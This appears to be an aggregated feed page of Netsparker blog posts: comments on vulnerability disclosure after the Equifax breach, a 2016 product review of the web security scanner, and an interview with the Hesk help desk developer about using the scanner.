Fixing serious vulnerabilities that affect a wide range of customers should be a top priority on the IT security professional's agenda. In recent years, there were lots of security issues that had serious consequences for numerous companies – vulnerabilities such as Shellshock and Heartbleed. Within a relatively short time after the announcement, hackers had already devised automated exploits.

Corporations Should Have a Vulnerability Disclosure Process or Bug Bounty

While a few years ago you could patch your applications days after the announcement, nowadays you cannot let more than a few hours elapse. The chances of someone exploiting vulnerabilities within just a few minutes are very high. This is especially true for web application vulnerabilities, where exploits are generally fast and easy to build.

But there were other problems that came to light following Hoyt's discovery. There was no obvious way for him to report his findings about annualcreditreport.com to Equifax.

The fact that none of the Credit Agencies currently have a Coordinated Vulnerability Disclosure Process or Bug Bounty indicates to me they don't understand the big picture of Bug Reporting.

A good way to ensure that researchers can report the possible flaws they identify in your web applications is to have an advertised and coordinated Vulnerability Disclosure or Bug Bounty Program.

The Federal Trade Commission (FTC) Should be More Proactive

Another thing that David Hoyt found disturbing was the lack of control from the FTC.

The FTC should take steps to monitor the Security Posture of such an important Website in Real Time and not rely on executives to Notify for a Breach after their Stock Sales have Settled.

The fact that the announcement of the Equifax breach came months after it happened put consumers at unnecessary risk. Had the FTC had existing insight into the company's IT security procedures, the general public would have known about the breach much earlier and could have reacted appropriately.

Netsparker's 2016 in Review

$
0
0

2016 was a great year for Netsparker! We were the first (and only) web application security scanner vendor to introduce a number of cutting-edge technologies that make it possible to scale up web scanning and easily scan 100s and 1000s of websites, without having to spend hours configuring complex tools and days verifying that the vulnerabilities the scanner has detected are not false positives.

In 2016 we have also introduced the monthly updates for our web application security scanner. We have also been featured in a number of interviews on some popular podcasts and more, as highlighted in this overview post.

Automating and Scaling Up Web Vulnerability Scanning

The first Netsparker update we released in 2016 focused on automation and scalability. We developed features in the scanner to help users automate much more of both the pre-scan (configuration) and post-scan (verifying the results). The February 2016 update of Netsparker scanner had:

 Automatic recognition and configuration of URL rewrite rules: you do not need to know the URL rewrite configuration on the target and configure the scanner to crawl and scan all the parameters on the target website.

 Proof-Based Scanning Technology: a technology that automatically generates a proof of exploit of the identified vulnerabilities, so you do not have to manually verify them. Here is a short two minute video on how this technology works, which we have also done in 2016.

In the February 2016 update of Netsparker web application security scanner we also released the:

Monthly Web Security Scanner Updates

Since April 2016 we started releasing a monthly update of both the Netsparker web scanner editions. The advantage of monthly releases is that you do not have to wait four, five or more months to start using a new feature. If a feature is developed, it means it is needed and it will help you automate more, so we will release it once it is ready. Below are some of the highlights from the 2016 product updates:

Apart from all the new features and scanner improvements, every month we are introducing new web vulnerability checks and improving the existing ones. We are also frequently adding new security checks such as checks for Subresource Integrity and Content Security Policy, to help you build more secure web applications.

Free Netsparker Cloud Scans, Interviews and More from Netsparker

In 2016 we have also announced free Netsparker Cloud web vulnerability scans avaialble for open source projects. Several open source projects are already benefitting from this campaign, including OpenCart, who are featured in this web security case study.

Our CEO Ferruh Mavituna has also been interviewed several times during 2016. Starting with an interview in which he explains what is Netsparker at RSA in San Francisco, and then four more interviews on the popular security show Paul’s Security Weekly. You can watch all the interviews from the below links:

We also hosted a webcast with our friends from Denim group on how to optimize your application security program with Netsparker and ThreadFix.

What’s in Store for Netsparker Web Security Scanner in 2017?

In 2016 we have pushed the boundaries of what we can automate in web application security. For 2017 the mantra will be the same. Continue improving the cloud-based and desktop editions of our web application security scanner both in terms of features, ease of use, automation and also scanning capabilities.

Hesk Developer Uses Netsparker to Automate Web Application Security

$
0
0

“I have a hard time finding any negative aspects to Netsparker Cloud. It is hands down a great tool — all you could wish for from an automated web security scanner. Easy to use and detailed with a low false positive rate.”

Hesk LogoThe customer is always right, and we at Netsparker could not agree more to this statement. So what could be better than an interview with one of our web scanner’s users? This interview with Klemen Stirn, the project-lead, developer and support team for Hesk, explains why he found Netsparker to be a great tool for automating and scaling-up web application security, due to its ease of use and ample support.

Tell us a little more about Hesk and your role in the project.

Believe it or not, Hesk is currently a “one man team”. I fulfill the roles of project-lead, developer and support team. Hesk is free Help Desk Software allowing businesses to setup a web ticket-based customer support system. The philosophy behind Hesk is that not everyone needs a large and complicated customer support software, there is a need for a small and simple alternative.

Are you able to provide some specific details about the size and scope of Hesk?

Sure, I’ll do my best! Because Hesk is anonymous to download, determining an exact user-base is a little tricky. Looking at the Google Analytics data and download statistics, I would estimate that there are somewhere between 50k-100k installations and active users.

So clearly you have a significant user-base who rely on Hesk being secure. What else can you tell us about the application itself?

I started development of Hesk back in 2005. It was a long, slow process that involved adding both features and functionality over time. I wrote Hesk from the ground up without relying on any framework and I use only a handful of third-party libraries (including HTML purifier, POP3/SMTP and Javascript). At this point in time, the application has over 100k lines of code and growing.

Prior to Netsparker Cloud, how did you approach and deal with the challenge of web application security?

It has been both a challenge and a learning process. Obviously, I needed to pay close attention to any code or application functionality that might result in potential attack vectors — a time consuming and detail oriented process.

It has also helped that Hesk ships with source code. As a result, I have benefited from several third-party code reviews performed by pen testers. As well,  several vulnerabilities have been reported by Hesk end-users.

How has Netsparker Cloud changed your web application security protocols?

Well, the biggest change is that I now have Hesk installed on a test server. I use Netsparker Cloud to perform full scans as well as any required re-scans. My process now involves using Netsparker Cloud before any new version is pushed into a live environment or made available to the public.

I’ve never relied upon any automated web application security scanners before so this has resulted in a huge improvement in efficiency and confidence.

I’m able to write more secure code because Netsparker brings the latest vulnerabilities and best practices to my attention in a timely manner.

I feel more confident that the latest release isn’t introducing new vulnerabilities. Trusting that you’re releasing a secure application (to the best extent possible), makes it easier to sleep at night.

Are there any confirmed and resolved vulnerabilities you’re able to disclose?

Absolutely! Netsparker Cloud found a confirmed XSS vulnerability inside the administrator control panel.

Also, it helped to identify several necessary feature enhancements that included forcing SSL connections, marking cookies as secure and HttpOnly where needed and adding X-Frame-Options tags to assist in preventing Clickjacking.

Do you have any experiences with Netsparker support which you’d like to share?

I don’t — which is a good thing. Netsparker is very intuitive and easy to use so I’ve never had to rely on support.

What else can you share about your experience with Netsparker Cloud?

Free software is usually backed by a relatively small number of active developers; in the case of Hesk, it's a "one man show".

Because of this, any automated tool that performs a highly-specialized task (for example, a web application security scanner) is a godsend.

Netsparker Cloud is one such tool. It was a breeze to setup. I started my first cloud scan in literally a few minutes. This allowed me to spend precious time and resources on other priorities while waiting for the scan to complete.

Scan results are well organized, prioritized and provide verbose information where needed. For example, as a developer, I found the exact HTTP Request and Response very useful for reproducing issues and pinpointing/fixing them.

At times it felt like having someone looking over my shoulder pointing out even the smallest details that need attention; things that may take very little developer effort to fix, but in the end, help to make web applications like Hesk even more secure.

I have a hard time finding any negative aspects to Netsparker Cloud. It is hands down a great tool — all you could wish for from an automated web security scanner. Easy to use and detailed with a low false positive rate.

Viewing all 1027 articles
Browse latest View live


Latest Images